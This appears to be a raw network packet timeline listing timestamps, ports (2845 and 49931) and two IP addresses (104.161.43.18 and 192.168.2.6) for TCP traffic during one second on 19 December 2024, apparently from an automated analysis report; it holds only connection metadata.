                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.535725117 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.535880089 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.536015987 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.536730051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.536845922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.537091970 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.537877083 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.586925030 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.675610065 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.675627947 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.675726891 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.676028013 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.676044941 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.676279068 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.677063942 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.677124977 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.678086042 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.678374052 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.678414106 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.678932905 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.679235935 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.679251909 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.679529905 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.680193901 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.680241108 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.680295944 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.681226969 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.681504011 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.681719065 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.682354927 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.682569027 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.682810068 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.683379889 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.683643103 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.684262037 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.684461117 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.684530020 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.684853077 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.685421944 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.685467958 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.685662985 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.686507940 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.686626911 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.686701059 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.687551975 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.687747955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.688421011 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.688623905 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.688828945 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.688926935 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.689892054 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.689970016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.690304041 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.690716028 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.690834999 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.691786051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.691927910 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.691946030 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.692143917 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.692816973 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.692933083 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.693136930 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.693831921 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.693916082 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.693984032 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.694897890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.695018053 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.695131063 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.695919037 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.696080923 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.696980953 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.697120905 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.697150946 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.697201014 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.698126078 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.698235989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.698335886 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.699122906 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.699167013 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.700023890 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.700118065 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.700223923 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.700299978 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.701286077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.701303005 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.701419115 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.702208042 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.702455997 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.703078985 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.703263998 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.703466892 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.704253912 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.704418898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.704533100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.704622984 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.705447912 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.705617905 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.706191063 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.706473112 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.706598997 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.706964970 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.707504034 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.707748890 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.708540916 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.708587885 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.708626032 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.709366083 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.709558010 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.709681034 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.709870100 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.710654974 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.710728884 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.711204052 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.711639881 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.711668015 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.712672949 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.712712049 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.712877035 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.713073015 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.713942051 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.713953018 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.714080095 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.714831114 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.714849949 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.715024948 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.715900898 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.715914011 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.716033936 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.717011929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.717024088 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.717344046 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.718095064 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.718106985 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.718269110 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.718993902 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.719099998 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.719341040 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.720052004 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.720166922 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.721141100 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.721247911 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.721267939 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.722196102 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.722239017 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.722304106 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.722471952 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.723218918 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.723376036 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.723444939 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.724312067 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.724400043 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.724507093 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.725406885 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.725615025 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.725961924 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.726572990 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.726608038 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.726726055 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.727451086 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.727585077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.728152037 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.728461981 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.728652954 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.728739023 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.729505062 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.729614019 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.730545044 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.731873989 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.867933989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.867954016 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.868144035 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.868493080 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.868621111 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.868793964 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.869504929 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.869824886 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.869880915 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.869914055 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.870893955 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.870963097 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.870978117 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.871906996 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.872025013 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.872037888 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.872970104 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.873131037 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.873177052 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.874042988 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.874094963 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.874140978 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.875132084 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.875246048 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.875274897 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.876158953 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.876255035 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.876291037 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.877197981 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.877335072 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.877370119 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.878252029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.878290892 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.878330946 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.879265070 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.879333019 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.879376888 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.880311012 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.880395889 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.880469084 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.881380081 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.881580114 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.881727934 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.882539034 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.882610083 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.882641077 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.883517981 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.883583069 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.883610964 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.884521961 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.884593010 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.884613991 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.885576010 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.885659933 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.885690928 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.886651039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.886708975 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.886730909 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.887718916 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.887849092 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.887881041 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.888686895 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.888794899 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.888839006 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.889776945 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.889838934 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.889884949 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.890887976 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.890942097 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.890973091 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.891856909 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.891902924 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.891988039 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.892930984 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.893074989 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.893125057 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.894162893 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.894248009 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.894295931 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.895101070 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.895117044 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.895149946 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.896173000 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.896188974 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.896224976 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.897155046 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.897170067 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.897206068 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.898216963 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.898226023 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.898277044 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.899214029 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.899266958 CET284549931104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.899286985 CET499312845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:15.900326014 CET284549931104.161.43.18192.168.2.6
